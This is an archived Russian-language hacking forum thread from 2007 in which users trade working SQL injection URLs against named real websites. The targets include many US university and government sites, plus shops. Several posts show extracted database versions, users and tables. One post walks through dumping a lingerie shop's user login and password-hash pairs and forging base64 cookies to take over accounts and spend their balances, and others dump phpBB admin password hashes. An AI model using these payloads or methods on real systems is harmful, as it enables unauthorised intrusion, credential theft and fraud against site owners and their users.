ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
30.09.2007, 22:48
|
|
Новичок
Регистрация: 27.09.2007
Сообщений: 11
Провел на форуме:
142777
Репутация:
4
|
|
http://www.jm-hohenems.at/index.php?id=-1+union+select+1,2,3,4,5,6,7,user,9+from+mysql.use r--&lang=1'
|
|
|
30.09.2007, 22:59
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
Провел на форуме:
2030482
Репутация:
1796
|
|
Помучал гугль на edu сервера, вывод:
Каждая пятая ссылка уязвима к SQL injection
Из этих ссылок на каждой второй легко провести SQL injection
bti.cornell.edu
Код:
http://bti.cornell.edu/page.php?id=111' OR 1=IF(SUBSTRING(VERSION(),1,1)=3,1,0)/*
3 версия мускуля
gmu.edu
Код:
http://gmu.edu/cfa/calendar/eventlisting.php?id=-598' UNION SELECT 1,2,3,CONCAT_WS(':',VERSION(),USER(),DATABASE()),5,6,7,8,9,10,11,12,13,14,15,16,17/*
4.0.24_Debian-10sarge2-log ublic@jiju.gmu.edu:centerarts
www.bact.wisc.edu
Код:
http://www.bact.wisc.edu/GradStudies/facultyListing.php?id=-25 UNION SELECT 1,CONCAT_WS(0x203A20,VERSION(),USER(),DATABASE()),3,4,5,6,7,8,9,10,11/*
4.1.22-log : viewTables@localhost : bactsite
wwwrsphysse.anu.edu.au (сразу на заметил что не edu сервер... и как раз пятая версия мускула  )
Код:
http://wwwrsphysse.anu.edu.au/nuclear/personnel.php?id=-50 UNION SELECT 1,2,3,4,5,6,CONCAT_WS(0x203A20,VERSION(),USER(),DATABASE()),8,9,10,11,12,13,14,15,16,17,18
5.0.22 : nucleus_reader@rsphyweb.anu.edu.au : nucleus
www.ns.umich.edu
Код:
http://www.ns.umich.edu/htdocs/releases/story.php?id=3125'
Тут UPDATE
genealogy.math.ndsu.nodak.edu
Код:
http://genealogy.math.ndsu.nodak.edu/id.php?id=18231'
Не разобралсо
www.salk.edu
Код:
http://www.salk.edu/faculty/faculty_details.php?id=-15'
Вроде чето есть, не разобралсо
qt.exploratorium.edu
Код:
http://qt.exploratorium.edu/cils/page.php?ID=15 UNION SELECT 1,2,3,4 /*
У меня вывести ничего не получилось...
stanfordphotonics.stanford.edu
Код:
http://stanfordphotonics.stanford.edu/calendar.event.php?id=53'
При подборе столбцов с помощью GROUP BY 3 столбца а на UNION SELECT 1,2,3 выдает ошибку...
-----------------------------------------------
Зы нашел в два раза больше чем тут, но половина оказалась баяном
__________________
Кто я?..
|
|
|
|
01.10.2007, 00:27
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642
Репутация:
569
|
|
код:
http://pk.kiev.ua/i2index.php?id=-4'+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,id,lo gin,name,email,pass),9,10,11,12,13,14+from+users+l imit+0,1/*
администрация предупреждена об уязвимости
Последний раз редактировалось fobofob; 01.10.2007 в 02:46..
|
|
|
|
01.10.2007, 00:45
|
|
Reservists Of Antichat - Level 6
Регистрация: 23.08.2007
Сообщений: 1,237
Провел на форуме:
18127311
Репутация:
1676
|
|
http://pk.kiev.ua/i2index.php?id=-4'+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,id,lo gin,name,email,pass),9,10,11,12,13,14+from+users+l imit+0,1/*
Пожалуйста! помогите найти админку
Блин, а где ты её искал то? http://pk.kiev.ua/admin/
|
|
|
|
01.10.2007, 02:30
|
|
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
Провел на форуме:
1628290
Репутация:
474
|
|
Магазин эротичного белья Shirley.RU
Сама скуль:
Код:
http://shirley.ru/cat.php?id=3+and+1=0+union+select+1,2/*
Узнаем версию и юзверя:
Код:
http://shirley.ru/cat.php?id=3+and+1=0+union+select+concat_ws(0x3a,user(),version()),2/*
shir@localhost:5.0.33
Узнаем имена таблиц:
Код:
http://shirley.ru/cat.php?id=3+and+1=0+union+select+table_name,2+from+INFORMATION_SCHEMA.tables+limit+16,1/*
Интересные:
shir_balance
shir_cart_orders
shir_cart_orderitems
shir_cart_prod_assort
shir_opt_users
shir_session
shir_users
shir_users_new
Узнаем имена столбцов:
Код:
http://shirley.ru/cat.php?id=3+and+1=0+union+select+concat_ws(0x3a,table_name,column_name),2+from+INFORMATION_SCHEMA.columns+where+table_name=0x736869725F7573657273+limit+0,1/*
Интересное:
uid
uname
pass
email
Выводим uid,uname,pass
Код:
http://shirley.ru/cat.php?id=3+and+1=0+union+select+concat_ws(0x3a,uid,uname,pass),2+from+shir_users+limit+0,1/*
получаем идент:логин:мд5хэш
Регаемся:
Код:
http://shirley.ru/user.php?name=new_user
Заходим в свой акк, смотрим куки (они зашифрованы в base64). Декодируем и получаем идент:логин:md5хэш
дэкодируем и вставляем чужие данные. Обновляем страницу и смотрим, что мы под дргим акком
На многих акках есть баланс, при чем крупненький 
благодаря таблице shir_balance можно вывести балан и номер пользователя, а дальше сами думаем
В общем заходим под акком и покупаем себе эротическое белье
|
|
|
|
01.10.2007, 16:00
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
edu&gov
http://www.y12.doe.gov/community/story.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,co ncat(char(64,64),convert(column_name+using+latin1) ,char(64,64))+from+information_schema.columns+wher e+table_name=0x416363657373+limit+0,1/*
http://teleslin.lbl.gov/mysql/parseRTML2.php?id=-1+union+select+version(),user(),database(),4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40/*
http://journalism.berkeley.edu/events/details.php?ID=31337+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,version(),14,15,16,17,18,19,20,21,22,23 ,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,4 0,41,42,43,44,45,46,47,48,49,50,51,52,53,54/*
http://www.gatech.edu/calendar/event.php?id=-1+union+select+1,2,3,4,5,version(),7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30/*
http://www.coa.gatech.edu/news/event.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*
http://auroraforum.stanford.edu/events.php?id=-1+union+select+1,2,3,4,5,convert(version()+using+l atin1),7,8,9,10,11,12,13,14,15,16/*
http://www.choices.edu/resources/detail.php?id=-1+union+select+1,convert(version()+using+latin1),3 ,4,5,6,7,8,9,10,11,12,13,14,15,6,17,18,19,20,21,22 ,23,24,25,26/*
http://dma.ucla.edu/people/faculty.php?ID=-1+union+select+1,2,3,4,5,version(),7,8,9,10,11,12, 13,14,15,16/*
http://kmoddl.library.cornell.edu/resources.php?id=-1+union+select+11111111111111/*
http://cemcom.infosci.cornell.edu/people.php?uid=-1+union+select+1,version(),3,4,5,6,7,8,9/*
http://libguides.drury.edu/viewprofile.php?uid=-1+union+select+1,2,version(),4,5,6/*
http://academic.sfsu.edu/ar/at/otl/fully_online_det.php?uid=-1'+union+select+1,version(),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24/*
http://www.ccrc.uga.edu/world/personnel/templateperson.php?uid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26/*
http://pride.uoregon.edu/point.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,version(),11,12,1 3,14,15,16,17,18,19,20/*
http://ets.berkeley.edu/AboutETS/Staff/profile.php?uid=-1+union+select+1,2,3,4,5,6,7,version(),9/*
http://forum.stanford.edu/research/profile.php?id=4015+and+ascii(substring(version(), 1,1))=0x35/*
http://www.valparaiso.edu/news/index.php?action=display&newsid=-1+union+select+1,2,3,4,5,6,7,8,9/*
http://eps.berkeley.edu/development/view_person.php?uid=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24/*
http://www.oit.duke.edu/help/service/details.php?uid=-1'+union+select+1,version(),3,4,5,6,7,8,9/*
http://dms.dartmouth.edu/faculty/facultydb/view.php?uid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,convert(ver sion()+using+latin1),13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,32,32,33,34,35,36,37,38/*
http://outcomes.web.arizona.edu/data.php?uid=-1+union+select+convert(table_name+using+latin1)+fr om+information_schema.tables+where+table_schema=0x 6f7574636f6d6573+limit+7,1/*
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
01.10.2007, 17:00
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429
Репутация:
728
|
|
http://www1.dontsova.ru/
Код:
http://www1.dontsova.ru/view_news.php?id=-197'+union+select+1,2,3,4,5,user_pas sword,7,username,9,10,11,12, 13+from+phpbb_users+where+user_id=1+limit+1/*
http://mayonez.com/
Код:
http://mayonez.com/news.php?id=-22+union+select+1,2,VERSI ON(),4,5/*
Последний раз редактировалось 0nep@t0p; 01.10.2007 в 17:48..
|
|
|
|
01.10.2007, 17:16
|
|
Познающий
Регистрация: 15.08.2007
Сообщений: 97
Провел на форуме:
366486
Репутация:
100
|
|
http://www.srt.lv/lv/index.php?option=com_mambads&Itemid=0&func=detail& cacat=1&casb=1&caid=999/**/Union/**/select/**/1,2,3,4,5,concat(char(117,115,101,114,110,97,109,1 01,58),username,char(32,112,97,115,115,119,111,114 ,100,58),password),7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23%20from%20mos_users/*
|
|
|
|
01.10.2007, 23:12
|
|
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508
Репутация:
1745
|
|
Код:
http://www.communicationvalley.it/FilesProc/CryptoFileContent.php?id=-13+union+select+1,2,3,table_name,5,6,7+from+information_schema.tables+limit+2,1/*
прикольный ответ от SQL сервера). Лимит в помощь)
Код:
http://www.lib.uwo.ca/news/view.php?id=-487'+union+select+1,table_name,3,4,5,6,7,8,9+from+information_schema.tables+limit+23,1/*
Код:
http://www.lib.uwo.ca/news/view.php?id=-487'+union+select+1,username,3,4,5,6,7,8,9+from+users+limit+1,1/*
Последний раз редактировалось KPOT_f!nd; 02.10.2007 в 00:04..
|
|
|
|
02.10.2007, 00:33
|
|
Познающий
Регистрация: 13.01.2007
Сообщений: 96
Провел на форуме:
575156
Репутация:
50
|
|
Раскрутите)
Код:
http://www.schleuderwelt.com/print.php?printpage='+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*
|
|
|
|
|
|
|
|
Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
|
|
|
|
Похожие темы
Линейный вид
